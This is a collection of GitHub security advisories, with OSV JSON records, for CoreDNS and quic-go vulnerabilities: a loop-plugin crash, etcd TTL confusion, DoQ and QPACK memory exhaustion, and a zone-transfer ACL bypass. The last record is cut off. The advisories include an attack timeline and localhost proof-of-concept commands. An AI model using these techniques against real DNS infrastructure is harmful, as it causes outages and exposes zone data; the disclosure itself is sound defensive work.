A Denial of Service vulnerability exists in CoreDNS's loop detection plugin that allows an attacker to crash the DNS server by sending specially crafted DNS queries. The vulnerability stems from the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name, combined with a fatal error handler that terminates the entire process.
Technical Details
Vulnerability Description
The CoreDNS loop plugin is designed to detect forwarding loops by performing a self-test during server startup. The plugin generates a random query name (qname) using Go's math/rand package and sends an HINFO query to itself. If the server receives multiple matching queries, it assumes a forwarding loop exists and terminates.
The vulnerability arises from two design flaws:
-
Predictable PRNG Seed: The random number generator is seeded with
time.Now().UnixNano(), making the generated qname predictable if an attacker knows the approximate server start time. -
Fatal Error Handler: When the plugin detects what it believes is a loop (3+ matching HINFO queries), it calls
log.Fatalf()which invokesos.Exit(1), immediately terminating the process without cleanup or recovery.
Affected Code
File: plugin/loop/setup.go
// PRNG seeded with predictable timestamp
var r = rand.New(time.Now().UnixNano())
// Qname generation using two consecutive PRNG calls
func qname(zone string) string {
l1 := strconv.Itoa(r.Int())
l2 := strconv.Itoa(r.Int())
return dnsutil.Join(l1, l2, zone)
}
File: plugin/loop/loop.go
func (l *Loop) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) (int, error) {
// ... validation checks ...
if state.Name() == l.qname {
l.inc() // Increment counter
}
if l.seen() > 2 {
// FATAL: Terminates entire process
log.Fatalf("Loop (%s -> %s) detected for zone %q...", ...)
}
// ...
}
File: plugin/pkg/log/log.go
func Fatalf(format string, v ...any) {
logf(fatal, format, v...)
os.Exit(1) // Immediate process termination
}
Exploitation Window
The loop plugin remains active during the following conditions:
| Condition | Window Duration | Attack Feasibility |
|---|---|---|
| Healthy startup | 2 seconds | Requires precise timing |
| Self-test failure (upstream unreachable) | 30 seconds | HIGH - Extended window |
| Network degradation | Variable | Depends on retry behavior |
Attack Scenario
Primary Attack Vector: Network Degradation
When the upstream DNS server is unreachable (network partition, misconfiguration, outage), the loop plugin's self-test fails repeatedly. During this period:
- The loop plugin remains active for up to 30 seconds
- Each self-test attempt generates an HINFO query visible in CoreDNS logs
- An attacker with log access (shared Kubernetes cluster, centralized logging) can observe the qname
- The attacker sends 3 HINFO queries with the observed qname
- The server immediately crashes
┌──────────────────────────────────────────────────────────────────────────┐
│ ATTACK TIMELINE │
├──────────────────────────────────────────────────────────────────────────┤
│ T+0s CoreDNS starts, PRNG seeded with UnixNano() │
│ T+0.5s Self-test HINFO query sent (visible in logs) │
│ T+2s Self-test fails (upstream timeout) │
│ T+3s Retry #1 - counter resets, qname unchanged │
│ T+5s Retry #2 - attacker observes qname in logs │
│ T+5.1s ATTACKER: Send HINFO #1 → counter = 1 │
│ T+5.2s ATTACKER: Send HINFO #2 → counter = 2 │
│ T+5.3s ATTACKER: Send HINFO #3 → counter = 3 → os.Exit(1) │
│ T+5.3s SERVER CRASHES │
└──────────────────────────────────────────────────────────────────────────┘
Impact Assessment
Attack Requirements
| Requirement | Notes |
|---|---|
| Network Access | Must be able to send UDP packets to CoreDNS port |
| Log Access | Required to observe the qname (common in shared clusters) |
| Timing | Extended window during network degradation |
| Authentication | None required |
Real-World Impact
CoreDNS is the default DNS server for Kubernetes clusters. A successful attack would:
- Disruption: All DNS resolution fails within the cluster
- Cascading Failures: Services unable to discover each other
- Restart Loop: If attack persists, CoreDNS enters crash-restart cycle
- Data Plane Impact: Application-level failures across the cluster
References
- CoreDNS GitHub: https://github.com/coredns/coredns
- Loop Plugin Documentation: https://coredns.io/plugins/loop/
- Go math/rand Documentation: https://pkg.go.dev/math/rand
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26018"
],
"database_specific": {
"cwe_ids": [
"CWE-337"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-06T22:08:22Z",
"nvd_published_at": "2026-03-06T16:16:10Z",
"severity": "HIGH"
},
"details": "## Executive Summary\n\nA Denial of Service vulnerability exists in CoreDNS\u0027s loop detection plugin that allows an attacker to crash the DNS server by sending specially crafted DNS queries. The vulnerability stems from the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name, combined with a fatal error handler that terminates the entire process.\n\n---\n## Technical Details\n\n### Vulnerability Description\n\nThe CoreDNS `loop` plugin is designed to detect forwarding loops by performing a self-test during server startup. The plugin generates a random query name (`qname`) using Go\u0027s `math/rand` package and sends an HINFO query to itself. If the server receives multiple matching queries, it assumes a forwarding loop exists and terminates.\n\n**The vulnerability arises from two design flaws:**\n\n1. **Predictable PRNG Seed**: The random number generator is seeded with `time.Now().UnixNano()`, making the generated qname predictable if an attacker knows the approximate server start time.\n\n2. **Fatal Error Handler**: When the plugin detects what it believes is a loop (3+ matching HINFO queries), it calls `log.Fatalf()` which invokes `os.Exit(1)`, immediately terminating the process without cleanup or recovery.\n\n### Affected Code\n\n**File: `plugin/loop/setup.go`**\n```go\n// PRNG seeded with predictable timestamp\nvar r = rand.New(time.Now().UnixNano())\n\n// Qname generation using two consecutive PRNG calls\nfunc qname(zone string) string {\n l1 := strconv.Itoa(r.Int())\n l2 := strconv.Itoa(r.Int())\n return dnsutil.Join(l1, l2, zone)\n}\n```\n\n**File: `plugin/loop/loop.go`**\n```go\nfunc (l *Loop) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) (int, error) {\n // ... validation checks ...\n \n if state.Name() == l.qname {\n l.inc() // Increment counter\n }\n\n if l.seen() \u003e 2 {\n // FATAL: Terminates entire process\n log.Fatalf(\"Loop (%s -\u003e %s) detected for zone %q...\", ...)\n }\n \n // ...\n}\n```\n\n**File: `plugin/pkg/log/log.go`**\n```go\nfunc Fatalf(format string, v ...any) {\n logf(fatal, format, v...)\n os.Exit(1) // Immediate process termination\n}\n```\n\n### Exploitation Window\n\nThe loop plugin remains active during the following conditions:\n\n| Condition | Window Duration | Attack Feasibility |\n|-----------|-----------------|-------------------|\n| Healthy startup | 2 seconds | Requires precise timing |\n| Self-test failure (upstream unreachable) | 30 seconds | **HIGH** - Extended window |\n| Network degradation | Variable | Depends on retry behavior |\n\n### Attack Scenario\n\n**Primary Attack Vector: Network Degradation**\n\nWhen the upstream DNS server is unreachable (network partition, misconfiguration, outage), the loop plugin\u0027s self-test fails repeatedly. During this period:\n\n1. The loop plugin remains active for up to 30 seconds\n2. Each self-test attempt generates an HINFO query visible in CoreDNS logs\n3. An attacker with log access (shared Kubernetes cluster, centralized logging) can observe the qname\n4. The attacker sends 3 HINFO queries with the observed qname\n5. The server immediately crashes\n\n```\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 ATTACK TIMELINE \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 T+0s CoreDNS starts, PRNG seeded with UnixNano() \u2502\n\u2502 T+0.5s Self-test HINFO query sent (visible in logs) \u2502\n\u2502 T+2s Self-test fails (upstream timeout) \u2502\n\u2502 T+3s Retry #1 - counter resets, qname unchanged \u2502\n\u2502 T+5s Retry #2 - attacker observes qname in logs \u2502\n\u2502 T+5.1s ATTACKER: Send HINFO #1 \u2192 counter = 1 \u2502\n\u2502 T+5.2s ATTACKER: Send HINFO #2 \u2192 counter = 2 \u2502\n\u2502 T+5.3s ATTACKER: Send HINFO #3 \u2192 counter = 3 \u2192 os.Exit(1) \u2502\n\u2502 T+5.3s SERVER CRASHES \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\n---\n\n## Impact Assessment\n\n### Attack Requirements\n\n| Requirement | Notes |\n|-------------|-------|\n| Network Access | Must be able to send UDP packets to CoreDNS port |\n| Log Access | Required to observe the qname (common in shared clusters) |\n| Timing | Extended window during network degradation |\n| Authentication | None required |\n\n### Real-World Impact\n\nCoreDNS is the default DNS server for Kubernetes clusters. A successful attack would:\n\n1. **Disruption**: All DNS resolution fails within the cluster\n2. **Cascading Failures**: Services unable to discover each other\n3. **Restart Loop**: If attack persists, CoreDNS enters crash-restart cycle\n4. **Data Plane Impact**: Application-level failures across the cluster\n\n## References\n\n- CoreDNS GitHub: https://github.com/coredns/coredns\n- Loop Plugin Documentation: https://coredns.io/plugins/loop/\n- Go math/rand Documentation: https://pkg.go.dev/math/rand",
"id": "GHSA-h75p-j8xm-m278",
"modified": "2026-03-06T22:08:22Z",
"published": "2026-03-06T22:08:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-h75p-j8xm-m278"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26018"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS Loop Detection Denial of Service Vulnerability"
}
GHSA-93MF-426M-G6X9
Vulnerability from github – Published: 2025-09-09 19:19 – Updated: 2025-09-10 21:07Summary
The CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.
Details
In plugin/etcd/etcd.go, the TTL() function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:
func (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {
etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration
// ... rest of function uses etcdTTL as actual TTL
}
Lease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.
This enables cache pinning attacks, such as:
- Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).
- Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).
- CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.
- Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.
Some resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.
PoC
- Launch etcd:
etcd \
--data-dir ./etcd-data \
--listen-client-urls http://127.0.0.1:2379 \
--advertise-client-urls http://127.0.0.1:2379 \
--listen-peer-urls http://127.0.0.1:2380 \
--initial-advertise-peer-urls http://127.0.0.1:2380 \
--initial-cluster default=http://127.0.0.1:2380 \
--name default \
--initial-cluster-token etcd-ttl-poc \
--initial-cluster-state new &
- Prepare CoreDNS configuration:
cat > Corefile << 'EOF'
skydns.local {
etcd {
path /skydns
endpoint http://localhost:2379
debug
}
log
errors
}
EOF
- Launch CoreDNS:
coredns -conf Corefile -dns.port=1053
- Create an etcd record called
large-lease-servicewith a lease grant of 1 hour:
LEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk '{print $2}')
etcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service '{
"host": "192.168.1.101",
"port": 8080
}' --lease=$LEASE_ID
- Verify the lease details:
$ etcdctl lease timetolive $LEASE_ID
lease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)
- Query the DNS record and observe the record TTL at 28 years:
$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A
large-lease-service.skydns.local. 901209123 IN A 192.168.1.101
Impact
Affects any CoreDNS deployment using the etcd plugin for service discovery.
- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.
- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)
- Confidentiality: None.
The bug was introduced in #1702 as part of the CoreDNS v1.2.0 release.
Mitigation
The TTL function should utilise etcd's Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.
Credit
Thanks to @thevilledev for disclovering this vulnerability and contributing a fix.
For more information
Please consult our security guide for more information regarding our security process.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.12.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58063"
],
"database_specific": {
"cwe_ids": [
"CWE-681"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-09T19:19:33Z",
"nvd_published_at": "2025-09-09T20:15:48Z",
"severity": "HIGH"
},
"details": "# Summary\n\nThe CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.\n\n# Details\n\nIn `plugin/etcd/etcd.go`, the `TTL()` function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:\n\n```go\nfunc (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {\n etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration\n // ... rest of function uses etcdTTL as actual TTL\n}\n```\n\nLease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.\n\nThis enables cache pinning attacks, such as:\n\n1. Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).\n2. Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).\n4. CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.\n5. Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.\n\nSome resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.\n\n# PoC\n\n1. Launch etcd:\n\n```bash\netcd \\\n --data-dir ./etcd-data \\\n --listen-client-urls http://127.0.0.1:2379 \\\n --advertise-client-urls http://127.0.0.1:2379 \\\n --listen-peer-urls http://127.0.0.1:2380 \\\n --initial-advertise-peer-urls http://127.0.0.1:2380 \\\n --initial-cluster default=http://127.0.0.1:2380 \\\n --name default \\\n --initial-cluster-token etcd-ttl-poc \\\n --initial-cluster-state new \u0026\n```\n\n2. Prepare CoreDNS configuration:\n\n```bash\ncat \u003e Corefile \u003c\u003c \u0027EOF\u0027\nskydns.local {\n etcd {\n path /skydns\n endpoint http://localhost:2379\n debug\n }\n log\n errors\n}\nEOF\n```\n\n3. Launch CoreDNS:\n\n```bash\ncoredns -conf Corefile -dns.port=1053\n```\n\n4. Create an etcd record called `large-lease-service` with a lease grant of 1 hour:\n\n```bash\nLEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk \u0027{print $2}\u0027)\n\netcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service \u0027{\n \"host\": \"192.168.1.101\",\n \"port\": 8080\n}\u0027 --lease=$LEASE_ID\n```\n\n7. Verify the lease details:\n\n```bash\n$ etcdctl lease timetolive $LEASE_ID\nlease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)\n```\n\n8. Query the DNS record and observe the record TTL at 28 years:\n\n```bash\n$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A\nlarge-lease-service.skydns.local. 901209123 IN A 192.168.1.101\n```\n\n# Impact\n\nAffects any CoreDNS deployment using the etcd plugin for service discovery.\n\n- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.\n- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)\n- Confidentiality: None.\n\nThe bug was introduced in #1702 as part of the CoreDNS [v1.2.0 release](https://github.com/coredns/coredns/releases/tag/v1.2.0).\n\n# Mitigation\n\nThe TTL function should utilise etcd\u0027s Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.\n\n# Credit\n\nThanks to [@thevilledev](https://github.com/thevilledev) for disclovering this vulnerability and contributing a fix.\n\n# For more information\n\nPlease consult our [security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.",
"id": "GHSA-93mf-426m-g6x9",
"modified": "2025-09-10T21:07:40Z",
"published": "2025-09-09T19:19:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58063"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
GHSA-CVX7-X8PJ-X2GW
Vulnerability from github – Published: 2025-06-06 21:27 – Updated: 2025-06-09 21:39Summary
A Denial of Service (DoS) vulnerability was discovered in the CoreDNS DNS-over-QUIC (DoQ) server implementation. The server previously created a new goroutine for every incoming QUIC stream without imposing any limits on the number of concurrent streams or goroutines. A remote, unauthenticated attacker could open a large number of streams, leading to uncontrolled memory consumption and eventually causing an Out Of Memory (OOM) crash — especially in containerized or memory-constrained environments.
Impact
- Component:
server_quic.go - Attack Vector: Remote, network-based
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Impact: High availability loss (OOM kill or unresponsiveness)
This issue affects deployments with quic:// enabled in the Corefile. A single attacker can cause the CoreDNS instance to become unresponsive using minimal bandwidth and CPU.
Patches
The patch introduces two key mitigation mechanisms:
max_streams: Caps the number of concurrent QUIC streams per connection. Default:256.worker_pool_size: Introduces a server-wide, bounded worker pool to process incoming streams. Default:1024.
This eliminates the 1:1 stream-to-goroutine model and ensures that CoreDNS remains resilient under high concurrency. The new configuration options are exposed through the quic Corefile block:
quic {
max_streams 256
worker_pool_size 1024
}
These defaults are generous and aligned with typical DNS-over-QUIC client behavior.
Workarounds
If you're unable to upgrade immediately, you can:
- Disable QUIC support by removing or commenting out the quic:// block in your Corefile
- Use container runtime resource limits to detect and isolate excessive memory usage
- Monitor QUIC connection patterns and alert on anomalies
References
- RFC 9250 - DNS over Dedicated QUIC Connections
- quic-go GitHub project
- QUIC stream exhaustion class of vulnerabilities (related)
Credit
Thanks to @thevilledev for disclovering this vulnerability and contributing a high-quality fix.
For more information
Please consult our security guide for more information regarding our security process.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.12.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-47950"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-06T21:27:27Z",
"nvd_published_at": "2025-06-06T18:15:35Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA **Denial of Service (DoS)** vulnerability was discovered in the CoreDNS DNS-over-QUIC (DoQ) server implementation. The server previously created a new goroutine for every incoming QUIC stream without imposing any limits on the number of concurrent streams or goroutines. A remote, unauthenticated attacker could open a large number of streams, leading to uncontrolled memory consumption and eventually causing an Out Of Memory (OOM) crash \u2014 especially in containerized or memory-constrained environments.\n\n### Impact\n\n- **Component**: `server_quic.go`\n- **Attack Vector**: Remote, network-based\n- **Attack Complexity**: Low\n- **Privileges Required**: None\n- **User Interaction**: None\n- **Impact**: High availability loss (OOM kill or unresponsiveness)\n\nThis issue affects deployments with `quic://` enabled in the Corefile. A single attacker can cause the CoreDNS instance to become unresponsive using minimal bandwidth and CPU.\n\n### Patches\n\nThe patch introduces two key mitigation mechanisms:\n\n- **`max_streams`**: Caps the number of concurrent QUIC streams per connection. Default: `256`.\n- **`worker_pool_size`**: Introduces a server-wide, bounded worker pool to process incoming streams. Default: `1024`.\n\nThis eliminates the 1:1 stream-to-goroutine model and ensures that CoreDNS remains resilient under high concurrency. The new configuration options are exposed through the `quic` Corefile block:\n\n```\nquic {\n max_streams 256\n worker_pool_size 1024\n}\n```\n\nThese defaults are generous and aligned with typical DNS-over-QUIC client behavior.\n\n### Workarounds\n\nIf you\u0027re unable to upgrade immediately, you can:\n- Disable QUIC support by removing or commenting out the `quic://` block in your Corefile\n- Use container runtime resource limits to detect and isolate excessive memory usage\n- Monitor QUIC connection patterns and alert on anomalies\n\n### References\n\n- [RFC 9250 - DNS over Dedicated QUIC Connections](https://datatracker.ietf.org/doc/html/rfc9250)\n- [quic-go GitHub project](https://github.com/quic-go/quic-go)\n- [QUIC stream exhaustion class of vulnerabilities (related)](https://www.usenix.org/conference/usenixsecurity23/presentation/botella)\n\n### Credit\n\nThanks to [@thevilledev](https://github.com/thevilledev) for disclovering this vulnerability and contributing a high-quality fix.\n\n### For more information\n\nPlease consult our [security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.",
"id": "GHSA-cvx7-x8pj-x2gw",
"modified": "2025-06-09T21:39:31Z",
"published": "2025-06-06T21:27:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-cvx7-x8pj-x2gw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47950"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/commit/efaed02c6a480ec147b1f799aab7cf815b17dfe1"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc9250"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/quic-go/quic-go"
},
{
"type": "WEB",
"url": "https://www.usenix.org/conference/usenixsecurity23/presentation/botella"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS Vulnerable to DoQ Memory Exhaustion via Stream Amplification"
}
GHSA-G754-HX8W-X2G6
Vulnerability from github – Published: 2025-12-11 16:48 – Updated: 2025-12-17 00:36Summary
An attacker can cause excessive memory allocation in quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion.
Impact
A misbehaving or malicious peer can cause a denial-of-service (DoS) attack on quic-go's HTTP/3 servers or clients by triggering excessive memory allocation, potentially leading to crashes or exhaustion. It affects both servers and clients due to symmetric header construction.
Details
In HTTP/3, headers are compressed using QPACK (RFC 9204). quic-go's HTTP/3 server (and client) decodes the QPACK-encoded HEADERS frame into header fields, then constructs an http.Request (or response).
http3.Server.MaxHeaderBytes and http3.Transport.MaxResponseHeaderBytes, respectively, limit encoded HEADERS frame size (default: 1 MB server, 10 MB client), but not decoded size. A maliciously crafted HEADERS frame can expand to ~50x the encoded size using QPACK static table entries with long names / values.
RFC 9114 requires enforcing decoded field section size limits via SETTINGS, which quic-go did not do.
The Fix
quic-go now enforces RFC 9114 decoded field section size limits, sending SETTINGS_MAX_FIELD_SECTION_SIZE and using incremental QPACK decoding to check the header size after each entry, aborting early on violations with HTTP 431 (on the server side) and stream reset (on the client side).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/quic-go/quic-go"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.57.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64702"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-11T16:48:27Z",
"nvd_published_at": "2025-12-11T21:15:54Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nAn attacker can cause excessive memory allocation in quic-go\u0027s HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an `http.Header` (used on the `http.Request` and `http.Response`, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion.\n\n## Impact\n\nA misbehaving or malicious peer can cause a denial-of-service (DoS) attack on quic-go\u0027s HTTP/3 servers or clients by triggering excessive memory allocation, potentially leading to crashes or exhaustion. It affects both servers and clients due to symmetric header construction.\n\n## Details\n\nIn HTTP/3, headers are compressed using QPACK (RFC 9204). quic-go\u0027s HTTP/3 server (and client) decodes the QPACK-encoded HEADERS frame into header fields, then constructs an http.Request (or response).\n\n`http3.Server.MaxHeaderBytes` and `http3.Transport.MaxResponseHeaderBytes`, respectively, limit encoded HEADERS frame size (default: 1 MB server, 10 MB client), but not decoded size. A maliciously crafted HEADERS frame can expand to ~50x the encoded size using QPACK static table entries with long names / values.\n\nRFC 9114 requires enforcing decoded field section size limits via SETTINGS, which quic-go did not do.\n\n## The Fix\n\nquic-go now enforces RFC 9114 decoded field section size limits, sending SETTINGS_MAX_FIELD_SECTION_SIZE and using incremental QPACK decoding to check the header size after each entry, aborting early on violations with HTTP 431 (on the server side) and stream reset (on the client side).",
"id": "GHSA-g754-hx8w-x2g6",
"modified": "2025-12-17T00:36:27Z",
"published": "2025-12-11T16:48:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-g754-hx8w-x2g6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64702"
},
{
"type": "WEB",
"url": "https://github.com/quic-go/quic-go/commit/5b2d2129f8315da41e01eff0a847ab38a34e83a8"
},
{
"type": "PACKAGE",
"url": "https://github.com/quic-go/quic-go"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "quic-go HTTP/3 QPACK Header Expansion DoS"
}
GHSA-H8MM-C463-WJQ3
Vulnerability from github – Published: 2026-04-28 22:44 – Updated: 2026-05-08 15:28Summary
CoreDNS' transfer plugin can select the wrong ACL stanza when both a parent zone and a more-specific subzone are configured. A permissive parent-zone transfer rule can override a restrictive subzone rule (name-dependent), allowing an unauthorized client to perform AXFR/IXFR for the subzone and retrieve its zone contents.
Details
In plugin/transfer/transfer.go, stanza selection is implemented by longestMatch(), which is documented as "longest zone match wins", but it actually chooses the winner via a lexicographic string comparison: - zone := "" // longest zone match wins (plugin/transfer/transfer.go) - if z > zone { zone = z; x = xfr } (plugin/transfer/transfer.go)
So, a parent zone like example.org. can beat a child zone like a.example.org. purely due to lexicographic ordering ("example.org." > "a.example.org."), even though the child zone is the longer/more specific suffix match. The bypass is data-dependent (some child labels will win, some will lose), making it operationally non-intuitive.
PoC
- Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well)
- Run python3 ./acl-repro.py
- Expected output: *** Baseline (only subzone transfer rule) *** axfr a.example.org.: rcode=5 ancount=0 (expected REFUSED=5)
*** Candidate (add permissive parent transfer rule) *** axfr a.example.org.: rcode=0 ancount=5 (expected NOERROR=0 with ancount>0)
*** OK *** Subzone transfer ACL bypass reproduced: adding a permissive parent-zone stanza can override a stricter child-zone stanza due to lexicographic zone selection.
Impact
Unauthorized zone transfer can expose full zone contents to a remote network client that was intended to be denied by a subzone-specific transfer policy.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33489"
],
"database_specific": {
"cwe_ids": [
"CWE-862",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-28T22:44:39Z",
"nvd_published_at": "2026-05-05T20:16:36Z",
"severity": "HIGH"
},
